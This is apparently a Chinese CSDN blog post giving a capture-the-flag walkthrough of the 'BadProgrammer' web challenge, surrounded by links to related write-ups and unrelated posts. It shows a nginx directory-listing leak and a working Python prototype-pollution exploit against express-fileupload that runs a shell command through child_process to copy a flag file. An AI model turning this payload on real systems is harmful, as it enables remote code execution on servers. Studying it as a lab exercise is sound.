攻防世界-BadProgrammer

已于 2025-05-29 18:59:15 修改
阅读量323 收藏 3
点赞数 6
分类专栏: 攻防世界 文章标签: 前端 攻防世界
于 2025-05-29 18:56:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2501_91013872/article/details/148315979
版权

进入环境

查看源代码进行分析

把源代码复制到Visual里面进行分析

发现静态文件存放在/static/目录下

观察请求response header发现是nginx服务器加express框架

利用nginx配置错误,可以列目录

得到app.js源码

查看package.json文件

发现express-fileupload版本为1.1.7-alpha.4

进行污染获取文件信息

import requests

resp1 = requests.post("http://{}:{}/{}".format('223.112.5.141', '61286', '4_pATh_y0u_CaNN07_Gu3ss'),
        files={'__proto__.outputFunctionName': 
        (
            None, "x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x".format(cmd='cp /flag.txt /app/static/js/flag.txt')
        )})
print(resp1)

具体可参考@愚公搬代码

进行访问

http://223.112.5.141:61286/static/js/flag.txt

得到flag

攻防世界(MISC)高手进阶
doraemon12345的博客
11-27 989
1.What-is-this 连着提取几个压缩包后,得到两个图片,可能是盲水印或者图片合成,尝试了一下图片合成直接得到flag flag:AZADI TOWER 2.再见李华 题目是一个图片,上面有MD5但是有一段看不清,formost分离出一个压缩包,但是需要密码,回头看看题目说要署名,想到掩码攻击,但是总共有几位呢,看到不少于1000字,1000是二进制的8,于是尝试八位????lihua,无果,尝试九位?????lihua,得到密码,打卡压缩包,得到flag:Stayhungry,Stayfoolis
攻防世界--simple-check-100
qq_48274326的博客
01-02 743
攻防世界–simple-check-100 ida找到main函数 // bad sp value at call has been detected, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { void *v3; // esp int v5; // [esp-14h] [ebp-50h] int v6; // [esp-10h] [ebp-4Ch]
【愚公系列】2023年06月 攻防世界-Web(BadProgrammer
时光隧道
06-16 5203
Nginx源码泄露漏洞是一种安全漏洞,指攻击者可以通过某种方式获取Nginx服务器上的源代码文件,导致服务器的代码暴露在公众面前,进而被攻击者利用。这可能会导致最终用户资料泄露,甚至整个服务器被攻击者完全控制。该漏洞可能是由于Nginx服务器配置不当、身份验证机制不够严格、访问控制规则过于宽松等原因导致的。攻击者可能会通过各种手段获取Nginx服务器上的源代码,如使用爆破工具破解密码、获取系统管理员权限,或者利用其他漏洞绕过服务器的安全防御机制等。
攻防世界 web进阶区1
qq_61768489的博客
07-13 1158
baby_web 题目描述:想想初始页面是哪个 那第一感觉就是index.php 然后在url里面输入后直接跳转到1.php,所以抓包试试,就出了 Training-WWW-Robots 直接查看robots协议 PHP2 上来就这个 ,啥也没有 信息收集,后缀index.phps ,出现源码 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); e..
攻防世界Reverse简单难度bad_python题解
shenkong_的博客
10-17 3181
反编译出错,百度后了解到是文件头有问题,可以自行编译一个pyc文件,按照该正常文件头修改所给文件头即可。根据文件名得到编译环境为python3.6,所以执行下面的代码也应在python3.6下。pyc文件头占文件最开始的16字节,所以只需修改第一行即可。拿到的是一个pyc文件,反编译回py文件即可查看源码。根据反编译得到的源码写出逆向代码。修改完毕后再次反编译,得到源码。
攻防世界-MISC-练习区-12(功夫再高也怕菜刀)
qq_61993117的博客
11-30 1879
题目描述:菜狗决定用菜刀和菜鸡决一死战 这是攻防世界里面训练区的一道流量分析题,用wireshark 打开流量包 然后一级搜索http,二级用分组字节流搜索flag(按CTRL+F),并找到no.1367 在Line-basedtextdata:text/html(2lines)里面导出分节字节流后缀名要用.zip。打开导出的文件发现它需要密码 这个时候我们回到wireshark里面,然后用追踪...
攻防世界-misc-warmup题解
weixin_45876341的博客
11-06 1438
攻防世界-misc-warmup
攻防世界 - Misc - Level 2 - funny-video
12-14
本题的考察的是 MISC 中的音频隐写,要想过此关,你需要知道以下知识点: - 使用 MKVToolNix 查看非默认声道并导出。(`xxx.mp3`) - 使用 Audacity 查看音频的 “频谱图”。
攻防世界 - Misc - Level 3 - Miscellaneous-300
12-14
在CTF(Capture The Flag)挑战赛中,攻防世界是一个专门用于训练选手网络安全技能的平台。其中,Misc类别涵盖了多种杂项技能,例如密码学、隐写术、逆向工程等。本关“Miscellaneous-300”专注于音频隐写术,这是一...
攻防世界 - Misc - Level 2 - Hear-with-your-Eyes
12-13
在现代网络安全领域,攻防世界Misc级别的挑战题目通常旨在引导参与者学习如何通过不同的手法和技术手段来解决特定的问题。在这个题目“Hear-with-your-Eyes”中,我们被引导去深入探索音频隐写术。音频隐写术是一种...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界--杂项misc-János-the-Ripper--题解
zwy15288408160的博客
07-22 2127
用到的工具提示以下是本篇文章正文内容,下面案例可供参考ARCHPR是一款非常轻大的压缩包密码破解工具,支持ZIP、rar、ACE、ARJ等。界面简洁,使用方便,并支持多种密码方式,有暴力、掩码、字典、明文、担保winzip恢复、口令来自密匙等类型。压缩包密码解压工具ARCHPR下载-压缩包密码解压工具ARCHPR中文版下载-华军软件园(onlinedown.net)本人纯纯纯新手,以上方法仅为个人操作步骤,如有错误之处欢迎指正。有更简便的方法欢迎留言。httpshttpshttpshttps。.......
国芯思辰| 国产四通道24位生理电采集模拟前端AFE全面替换ADS1294R,心电贴性能再飞跃
weixin_38427020的博客
05-29 653
国芯思辰,国产芯片替代
vue组件和插件的区别
u014642921的博客
05-28 497
只要有install方法并且接受Vue构造函数作为参数,就能够被Vue.use使用。可以是第三方库,也可以是自己编写的组件。
el-table-column如何获取行数据的值
LoveYouQueena的博客
05-29 620
一旦你获取到了当前行的数据,就可以根据需要进行后续的操作或展示,比如删除、编辑当前行的数据等。的模板中定义一个按钮,并为该按钮添加一个点击事件处理器。在Vue 2.x中,你可以使用。属性(在Vue 3.x中)来获取当前行的数据。点击事件处理器会接收到一个参数(在Vue 2.x中是。如果你使用的是Vue 3.x,代码将略有不同,主要是将。中获取当前行的数据,并通过点击事件处理器进行后续操作。在Vue 3.x中,则使用。),该参数包含了当前行的数据。属性(在Vue 2.x中)或者。,在Vue 3.x中也是。
优雅草最新实战项目技术Discuz X3.5电子签约插件开发项目实施方案优雅草·卓伊凡
一颗优雅草科技-央千澈的CSDN博客~只想无穷无尽的学习~作息早8-晚8
05-27 1441
优雅草科技将为DiscuzX3.5系统开发电子签约插件,预算9,300元,工期35天。项目采用PHP7.4+e签宝SDK技术栈,实现合同发起、签署、模板管理等功能。包含UI设计、前端开发(响应式页面)、后端插件开发及文档培训。技术方案重点包括:集成e签宝API,新建签约记录数据表,开发后台管理界面,并确保与Discuz原生系统无缝集成。项目采用模块化开发,优先保障核心签约流程,提供3个月维护期。
网易 - 灵犀办公文档
最新发布
葡萄城技术团队博客
05-30 516
网易 - 灵犀办公文档
前端面试题目-高频问题集合
huidoo888的博客
05-30 780
单页面应用会将js、 css打包成一个文件,在加载页面显示的时候加载打包文件,如果打包文件较大或者网速慢则用户体验不好,首屏时需要请求一次html,同时还要发送一次js请求,两次请求回来了,首屏才会展示出来。在这个生命周期之间,进行初始化事件,进行数据的观测,可以看到在created的时候数据已经和data属性进行绑定(放在data中的属性当值发生改变的同时,视图也会改变)。栈在函数调用时,函数调用语句的下一条可执行语句的地址第一个进栈,然后函数的各个参数进栈,其中静态变量是不入栈的。
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值